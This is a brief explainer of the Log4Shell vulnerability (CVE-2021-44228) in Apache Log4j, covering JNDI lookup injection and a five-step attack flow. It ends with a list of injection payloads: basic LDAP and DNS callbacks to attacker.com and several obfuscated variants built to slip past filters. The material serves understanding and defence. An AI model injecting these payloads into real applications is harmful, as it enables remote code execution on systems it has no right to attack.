Log4j JNDI Injection (Log4Shell, CVE-2021-44228) is a critical vulnerability in Apache Log4j 2.x that allows remote code execution through JNDI (Java Naming and Directory Interface) lookup injection in log messages.
Log4j's message lookup substitution feature processes special syntax like ${jndi:ldap://...} in logged strings. When user-controlled data containing this syntax is logged, Log4j performs a JNDI lookup to an attacker-controlled server, which can return a malicious Java class for execution.
1. Attacker sends: ${jndi:ldap://attacker.com/exploit}
2. Application logs the input using Log4j
3. Log4j performs JNDI lookup to attacker's LDAP server
4. LDAP server returns reference to malicious Java class
5. Java loads and executes the malicious class# Basic payload
${jndi:ldap://attacker.com/a}
# DNS exfiltration
${jndi:dns://attacker.com}
# Obfuscated payloads
${${lower:j}ndi:ldap://x.com/a}
${j${::-n}di:ldap://x.com/a}
${${env:NaN:-j}ndi:ldap://x.com/a}